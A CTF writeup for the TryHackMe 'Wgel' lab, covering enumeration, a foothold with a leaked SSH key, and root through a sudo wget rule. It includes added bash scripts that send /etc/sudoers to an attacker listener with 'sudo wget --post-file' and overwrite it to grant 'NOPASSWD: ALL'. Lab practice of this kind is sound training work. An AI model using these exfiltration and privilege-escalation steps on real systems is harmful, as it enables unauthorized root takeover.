TryHackMe — Wgel CTF Writeup

Hritik Rai
ACM JUIT
Published in
4 min read · Jun 26, 2021

Wgel is a TryHackMe machine. It is an easy-rated box that demonstrates the basics of system hacking: service enumeration, a foothold through a leaked SSH private key, and a sudo misconfiguration that leads to root. TryHackMe provides mostly free labs to study and practice the penetration-testing and CTF skills a pen-tester needs.

Enumeration

NMAP Scan

So, we first use a tool called Nmap to scan the target IP address and learn which services are running and what vulnerabilities they might expose.

nmap -T4 -A -v {IP Address of victim machine}

From the above results we find that two ports are open: SSH, which we will use later, and HTTP on port 80.

So we enumerate port 80 first, as it hosts a website. On opening the site in a browser we find it is serving the default Apache2 Ubuntu page.

Source Code Enumeration

After going through the source code of the page, we find:

Hmm, looks like the page source mentions a user named 'jessie'.

DIRB enumeration

Here we use a tool called DIRB, a web content scanner that brute-forces directory and file names from a wordlist. It shows us possible directory routes on this site.

DIRB returned some awesome data:

Looks like we have hit a Jackpot!

http://10.10.3.112/sitemap/.ssh/

On browsing to that URL, we find a private RSA key, i.e. a user's SSH login key, exposed in a listable directory.

FootHold

Gaining a foothold means getting basic control over a system with minimal privileges, enough to execute a shell or to read and write private information.

Save the above RSA private key to a file, then open PuTTYgen to convert it to PuTTY's .ppk format:

Click Load to load the existing private key file.

After that click on Save private key.

Then open PuTTY, click Connection > SSH > Auth in the left navigation pane and configure the SSH private key to use by clicking Browse under Private key file for authentication.

Then log in using PuTTY

with the username 'jessie' that we found before.
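The same foothold from a Linux attacker box, without the PuTTYgen conversion. This is an added example and not part of the original writeup: the target address and the user name jessie come from the writeup, while the local file names are assumptions. The part worth knowing is the permission check: OpenSSH refuses a private key that other users can read, so the downloaded key has to be stored with owner-only permissions before `ssh -i` will accept it.

```bash
#!/usr/bin/env bash
# Added example (not from the writeup): stage the leaked key for OpenSSH
# instead of converting it to .ppk for PuTTY.
# Assumptions: local file names below; 10.10.3.112 and jessie are from the writeup.
set -eu

TARGET="10.10.3.112"
USER_NAME="jessie"
KEY_FILE="${KEY_FILE:-./jessie_id_rsa}"   # assumption: local file name for the staged key

# OpenSSH refuses to use a private key readable by other users
# ("UNPROTECTED PRIVATE KEY FILE!"), so copy it with owner-only permissions
# and check that it actually looks like a PEM private key first.
# Prints the resulting permission string on success.
stage_key() {   # usage: stage_key <downloaded key> <dest file>
    if ! head -n 1 "$1" | grep -q -- '-----BEGIN .*PRIVATE KEY-----'; then
        echo "$1 does not start with a PEM private key header" >&2
        return 1
    fi
    ( umask 077 && cp "$1" "$2" )
    chmod 600 "$2"                   # covers the case where dest already existed
    ls -l "$2" | cut -c1-10          # mode string, e.g. -rw-------
}

# Confirm the key parses and record its fingerprint; once logged in, it
# should match the entry in /home/jessie/.ssh/authorized_keys.
fingerprint_key() {   # usage: fingerprint_key <key file>
    ssh-keygen -l -f "$1"
}

# Typical use on the attacker machine (the key's file name under the
# listed directory is whatever DIRB showed; not filled in here):
#   wget -O downloaded_key http://10.10.3.112/sitemap/.ssh/<key file>
#   stage_key downloaded_key "$KEY_FILE"
#   fingerprint_key "$KEY_FILE"
#   ssh -i "$KEY_FILE" "$USER_NAME@$TARGET"
```

If `ssh -i` still prompts for a password, check the fingerprint against `authorized_keys` on the target once in, and make sure the key file does not carry Windows line endings from a copy-paste.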

Going into the Documents folder, we find user_flag.txt.

Root Privilege Escalation

Root privilege escalation is required to get the highest permissions on the system. The root user can do anything, including modifying the system files themselves.

On running sudo -l (this command lists the commands the current user is allowed to run with sudo, and whether a password is required) we get:

Found the LPE (Local Privilege Escalation) vector.

So we have sudo permissions for wget; I wonder what we can do. Since wget runs as root here, we can:

  • Upload (exfiltrate) files from the victim to the attacker machine (--post-file)
  • Download files from the attacker machine onto the victim
  • Overwrite files on the victim (-O)
  • Read any file on the victim, as root

So we could directly upload /root/root_flag.txt to our machine, but that is not enough in real life. Instead we will overwrite the /etc/sudoers file. This file defines which users and groups may run which commands through sudo, and whether they need a password for them (the NOPASSWD tag).

Start a netcat listener on your attacking machine to receive the file. This is not a reverse shell, just a raw TCP listener that will catch the HTTP POST wget sends:

nc -lvnp 80

And then, on the victim, we run wget through sudo with --post-file pointing at /etc/sudoers and the attacker's IP as the URL (port 80 is wget's default, so no port needs to be given):

The wget command sends the contents of /etc/sudoers as the body of an HTTP POST to the provided IP.

You will get output like this on your attacking machine, the HTTP request headers followed by the file contents:

Save the body of the request (everything after the headers) to a file named sudoer2.
Edit the NOPASSWD: /usr/bin/wget portion to NOPASSWD: ALL using ONLY visudo (visudo -f sudoer2), so the syntax is checked before the file goes back; a malformed sudoers file would lock us out of sudo on the victim.

Then download it back to the victim machine, using sudo wget with -O to overwrite /etc/sudoers. Because wget truncates the existing file in place, its original mode is kept. After that, sudo -l shows NOPASSWD: ALL and sudo can start a root shell.
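The exfiltrate-edit-overwrite sequence above, written out as a script so each step is explicit. This is an added example and not the writeup's own commands: the target address, the user jessie, the wget sudo rule and the file name sudoer2 come from the writeup; the attacker IP, the listener file name and the sample sudoers lines are assumptions constructed for the example. The two pure functions (`extract_body`, `patch_sudoers`) can be run anywhere; the two `sudo wget` functions are meant to be run on the victim.

```bash
#!/usr/bin/env bash
# Added example (not from the writeup): sudo-wget privilege escalation as a
# script. Assumptions: ATTACKER_IP, raw_post.txt, and the constructed sudoers
# sample. 10.10.3.112, jessie and sudoer2 are from the writeup.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.9.0.1}"   # assumption: attacker's VPN address
LPORT="${LPORT:-80}"                     # 80 is wget's default, so the URL needs no port

# Step 1 (attacker): catch the POST. Run in a second terminal:
#   nc -lvnp "$LPORT" | tee raw_post.txt
# Step 2 (victim, as jessie): push /etc/sudoers to that listener as root.
exfil_sudoers() {
    sudo /usr/bin/wget --post-file=/etc/sudoers "http://${ATTACKER_IP}:${LPORT}/"
}

# Step 3 (attacker): netcat shows the HTTP request headers first; the file
# starts after the first empty line (CRLF-terminated in HTTP).
extract_body() {   # usage: extract_body raw_post.txt > sudoer2
    awk 'body { print } /^\r?$/ { body = 1 }' "$1"
}

# Step 4 (attacker): widen the wget-only rule to NOPASSWD: ALL.
patch_sudoers() {  # usage: patch_sudoers sudoer2 > sudoer2.new
    sed 's#NOPASSWD: /usr/bin/wget#NOPASSWD: ALL#' "$1"
}

# Always syntax-check before shipping the file back: a malformed sudoers
# locks sudo out on the victim and burns the foothold.
check_sudoers() {  # usage: check_sudoers sudoer2.new
    if command -v visudo >/dev/null 2>&1; then
        visudo -c -f "$1"
    else
        echo "visudo not available here; run the check on a box that has it" >&2
        return 1
    fi
}

# Step 5 (attacker): serve the patched file, e.g. from its directory:
#   python3 -m http.server 8000
# Step 6 (victim): overwrite /etc/sudoers. wget truncates the existing file
# in place, so its original 0440 mode survives and sudo keeps accepting it.
overwrite_sudoers() {
    sudo /usr/bin/wget "http://${ATTACKER_IP}:8000/sudoer2" -O /etc/sudoers
    sudo -l      # should now list (ALL) NOPASSWD: ALL
    sudo -i      # root shell
}
```

Run the attacker-side steps in this order: listener, `extract_body raw_post.txt > sudoer2`, `patch_sudoers sudoer2 > sudoer2.new`, `check_sudoers sudoer2.new`, then serve `sudoer2.new` under the name sudoer2 before calling `overwrite_sudoers` on the victim.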

VOILA! We found the root flag, which means we pwned the machine.

Summer Intern at GPCSSI | Cyber security Enthusiast | Amazon Alexa Developer | Full Stack developer